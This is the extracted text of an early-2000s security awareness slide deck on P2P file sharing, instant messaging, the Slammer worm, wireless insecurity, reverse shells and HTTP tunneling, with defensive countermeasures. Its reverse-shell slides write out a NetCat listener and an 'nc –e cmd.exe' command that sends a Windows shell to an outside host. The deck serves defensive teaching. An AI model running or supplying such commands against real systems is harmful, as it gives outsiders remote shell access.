Analysts International
Stuff to Worry About in
Computer Security
A.K.A. “Firewall? I laugh at your puny
firewall”
V1.0 10-0802
Introductions
• Mark Lachniet from Analysts International,
Sequoia Services Group
• Senior Security Engineer and Security
Services technical lead
• Former I.S. director for Holt Public Schools
• Certified Information Systems Security
Professional (CISSP)
• Microsoft MCSE, Novell Master CNE, Linux
LPI Certified LPIC-1, Check Point Certified
CCSE, etc.
2
Agenda
•
•
•
•
•
•
•
Peer to Peer file sharing
Instant Messaging
Slammer (just for fun)
Wireless
Reverse command shells
HTTP Tunneling / GoToMyPC.com
Round table – Q&A – Brainstorming
3
Peer to Peer File Sharing
•
•
•
•
•
•
•
•
•
Several different networks and clients:
Aimster
FastTrack
iMesh
Audiogalaxy
MFTP
NeoModus
Gnutella
OpenNap
4
Peer to Peer File Sharing
• The most popular network by far is Gnutella
• Gnutella has many different clients including:
•
•
•
•
•
•
•
•
•
•
BearShare*
Gnucleus
GTK-Gnutella
LimeWire
Mactella
Morpheus*
Phex
Qtella
Shareaza*
XoLoX
• Different clients have different features,
systems and risks
5
P2P File Sharing History
• Napster was the first successful and
important one, but napster made one mistake
• Napster used centralized servers that were
under their control
• Hence the system could be shut down by
going after Napster with legal action
• Newer systems have “master” nodes, but all
they do is maintain lists of other peers out on
the network
• Master nodes are replaceable – you could
start your own P2P network by setting up
your own master servers
6
Napster-Style P2P
• This wasn’t too bad, at least you knew
what to block
7
Gnutella Style P2P
• This is *bad* for you because there is no
single choke point to cut off
8
P2P File Share Features
• Keyword searching
• Rate limiting / Quality of Service (via
bandwidth or simultaneous upload and
download limits)
• Request queuing at the serving host
• Chat facilities
• Use SHA hashes of files to uniquely ID:
– SHA hashes are unique by file
– ID’s files that are the same but have different names
– Allows for “swarm” downloads where parts of the same file
are downloaded from multiple sources simultaneously (cool)
– Allows for file resumption if a source is unavailable (turned
off, hung up, etc.)
– Allows for a patient person to get almost anything they can
find listed
9
Gnutella Communications
• Uses 5 distinct types of protocol messages: ping, pong,
query, query reply, and push
• Use Shareaza to get a good protocol analyzer /
decoder to see them
• Ping and Pong discovery – ask who is out there,
return IP address and amount of shared files
• Query and Query reply – gives search terms
(keywords) and minimum bandwidth requirements.
Reply gives IP address, port, speed, matching files
and GUID of querier
• Querier then connects to the server and attempts to
download the file (this will break if the server is
behind a firewall)
• The Push message is sent if the querier cannot
connect to the server to download the data
10
Push – Firewall Circumvention
• Sends the querier’s IP and port number and asks the
file host to push the file to it – this will bypass a single
firewall in the mix
• If both parties are behind a firewall you are probably
safe… For now…
• How can you stop it? Use a firewall to block *all*
outgoing communications
• Require a proxy server to mediate all requests
outwards (Squid, MS-PROXY, Border Manager)
• Its only a matter of time before P2P clients can tunnel
within HTTP requests that are “proxy friendly”
• Can already be done with special (but thankfully
complicated HTTP tunneling software)
• For Gnutella, you can block the “root” servers but an
alternate could always be used
11
P2P File Share Security Risks
• Spyware Spyware Spyware!
• Usually no virus scanning is done – you need to do
your own
• Spoofed servers will cough up Trojans for almost any
simple query (like the Benjamin Worm)
• Sharing of more than you intended
• “transit” sharing of naughty files has been hinted at!
• Security holes (intentional or not) in the software
itself
• Program minimizes (not shuts down) when exited
• P2P specific worms (e.g. the “Gnutella Worm”)
• Content problems and liability!
• Bandwidth leeching
12
Future P2P Risks
• A lot of things about P2P are “dicey” but haven’t yet
been exploited
• For example, the GUID is a unique identifies that is
sometimes based on MAC address! (pre win2k it is
said)
• That means that queries can be tracked to a
workstation
• A monitoring station could also record queries by
GUID/MAC as well as IP address and attempt to
ascertain information about that user (such as sexual
preferences, areas of interest, etc)
• Great possibility for leveraging P2P network as
Denial of Service zombies by tricking all Gnutella
clients into flooding a host (e.g. whitehouse.gov)
13
P2P “NG” Share Sniffer
• Operates under the creed of “who needs
Napster when you have Windows”
• Scans a subnet for “open” windows shares
and create a database of them
• These open shares are then used as the
storage repositories for various types of files
• This product used to be at sharesniffer.com
but is gone now. I wonder why
• This was allegedly going to be a pay service!
• Due the lack of awareness on the part of home
users, this will probably work quite well
14
Instant Messaging
• IM is everywhere, including my cell phone! (although
I don’t use it)
• Over 81 MILLION users
• Check out:
• http://www.infosecuritymag.com/2002/aug/cover.shtml
• Various types of clients: AOL, ICQ, Microsoft .NET
Messenger, Yahoo Messenger, etc.
• Specifically designed to get around firewalls in order
to work
• Require servers for some functions (login, user
lookup) but can talk directly to nodes for some things
(such as file transfers)
15
16
Problems with IM
• Bypasses gateway AntiVirus products
• Typically unencrypted
• Security problems in the software itself -many
previous hacks, probably many more to come
• May allow remote-control of machines inside the
firewall
• Ability to send files, URLs, etc. to individuals
• Hard to stop at the firewall
• Hard to track, log and account for
• No robust authentication systems
• Secure IM costs $$ and may require an ongoing
service contract or your own server
• May be a covered medium under CIPA????
17
Instant Messaging Problems
Case in Point - msgsnarf
• Dug Song released a number of network sniffing tools
at http://monkey.org/~dugsong/dsniff
• These are especially interesting because of their
special features!
• One feature is that it will work on a switch by using
“ARP poisoning” such that even switched networks
are vulnerable to sniffing
• Another feature is the inclusion of application-specific
sniffers such as mailsnarf (all SMTP messages),
webspy (all URLs) and msgsnarf (Instant Message
information)
• This might have a “white-hat” application, actually, if
you need to monitor it
18
IM management Techniques
• Use an IDS to alert you to matching traffic
(and then go slap the user)
• Block access to the login servers and ports
(refer to infosecurity magazine’s August issue
for details)
• Tightly control the workstation using imaging
and desktop security products
• Require the use of proxy servers (only works
in some cases – disable CONNECT on proxy)
• Use a specialized product to manage and
control the access such as Akonix – this
product can log and control IM and P2P
software
19
Slammer
•
•
•
•
•
Hit in late January, 2003
Known as Slammer or Sapphire
Was the fastest spreading worm ever
Took 10 minutes to cross the globe
Doubled the # of infected systems every 8.5
seconds in the first minute (compared to Code
Red, which doubled every 37 minutes)
• Took advantage of an old security bug in
Microsoft SQL server
• Especially hard hit were those with
Microsoft’s MSDE – a desktop version of SQL
server
20
Slammer
• Many people who had patched their SQL
servers with the proper patch were still hit
because of MSDE
• MSDE ships with a variety of products,
including versions of Visio, Microsoft Visual
Studio, etc.
• Took advantage of the fact that SQL server
runs with admin privileges
• Hence attacks on SQL servers are very
dangerous – if they succeed, you can run code
of your choice as admin
• The entire worm was fit into a single UDP
packet of less than 1k!
21
Wireless
• If you haven’t yet heard that wireless is
insecure, you have probably been living in a
cave and never get news of the outside world
• Yes, wireless is insecure…. Especially
anything you purchased less than 6 months
ago. Newer stuff is better
• Until recently, the only security that you could
get from the wireless Access Points (APs) was
Wired Equivalency Protection (WEP)
• WEP comes in 64bit and 128bit security
features, neither of which will do you any
good at all if someone really wants to get you
22
Wireless
• Wardriving – its fun, its cheap, and your
students think its spiffy
• Wireless leaks – connections can be made
from physical locations outside of your
control by using special hardware and
software
• Omnidirectional magnetic-mount antennas,
directional antennas, and even pringles cans
do a pretty good job of picking up signals you
never thought possible
• Not only can anyone find your network, but
they can (probably) tell what your SSID is, if
you use WEP, and what vendor your
equipment is
23
Wireless
• Above and beyond that, modern software
integrates with a GPS over a serial port to
record the longitude and latitude of your AP
• When posted on the internet, your dirty
laundry is aired out for all to see (*)
• Check out http://www.netstumbler.com for
lots of great information
• Try it out yourself, you may be surprised
• War driving is not, in itself, illegal! However,
if you ever use an AP without permission, that
is over the line.
24
From Work to Home
9 Access Points in 15 Minutes
25
Wireless Security Measures
• There are a few things you can do
• Put access points on a special DMZ segment on a
firewall and restrict traffic
• Require users to use a VPN client to access internal
resources
• Use a modern authentication system such as 802.1X
(in Windows XP) and/or LEAP
• These systems can require a successful authentication
(for example to a Radius server) before allowing a
user to associate with an access point
• Can also require MUTUAL authentication between
the AP and client in addition to user authentication
• If this didn’t exist, you could use a MitM (Man in the
Middle) attack to get auth info by setting up your
own “rogue” AP
26
Reverse Command Shells
• One would think that if you block all
incoming access, it should be impossible to
access internal systems
• This is only partially true, because it assumes
that the client is honest
• With P2P, IM and everything else, this is
clearly not the case any more – we cannot
trust our users to be security minded
• Reverse command shells, e.g. the NetCat
attack are particularly scary
• Using a utility program such as NetCat, even
a Windows server can be accessed from an
outside server
27
How Reverse Shells Work
• Imagine the above scenario. Lachniet.com cannot hit
anything on the inside network directly because you
have a firewall, a 10.X network, and no direct
Network Address Translation but the client has
Internet access
28
How Reverse Shells Work
• Hacker runs NetCat in Listen mode on port 8080 on
lachniet.com (netcat –l –p 8080)
• Client runs NetCat with an argument of cmd.exe and directs all
output to lachniet.com port 8080 (nc –e cmd.exe lachniet.com
8080)
29
How Reverse Shells Work
• The result – full access as logged in user
• To stop it – no outgoing access!
• Except by proxy server
30
HTTP Tunneling
• It used to be that a firewall, when properly
configured, would stop clients from doing naughty
things (like reverse command shells)
• Ideally we would block all outgoing access, and allow
only web access through a HTTP proxy server
• This is all well and good, but it is also possible to
encapsulate non-HTTP data inside of HTTP requests
and data, and then pass that data down to lower
layers of the OSI model
• In this way, even the most paranoid countermeasures
can be circumvented including a restrictive firewall
and a proxy server
• Technically speaking, it looks something like this:
31
HTTP Tunneling in Practice
• Client wants to run a P2P file sharing client
• Dotted lines are HTTP traffic, Solid line is TCP
32
GoToMyPC.com
• Basically the same thing, except you are using
a pay service for your HTTP tunnel
termination
• The service also acts as a broker for who can
connect to your PC
• Hopefully this broker is working properly and
the average hacker CANNOT connect to your
PC (note that I have seen some discussion of
WebEx conferencing having vulnerabilities
along these lines)
• You also get more control and presumably
security through SSL, reporting, users and
groups and such
33
HTTP Tunneling Counter-measures
• Block *all* outgoing traffic at a firewall, and require all
traffic to go through a proxy server
• Use a firewall with strict RFC compliance (I heard of some
reported success with Raptor/Symantec?)
• Make sure your proxy server doesn’t allow the CONNECT
verb
• Configure an IDS to sense certain types of HTTP
tunneling signatures (RealSecure can detect gotomypc.com
traffic signatures)
• Block all known destination servers such as those from the
gotomypc.com service
• Carefully review your firewall and proxy server logs! If
you see a large amount of HTTP activity going to a single
host (especially one that doesn’t seem legit) check it out –
go browse it yourself
• Log review may be your only recourse!
34
Q&A and Brainstorming
Mark Lachniet
Sr. Security Engineer
Analysts International
517.336.1004
mlachniet@analysts.com
35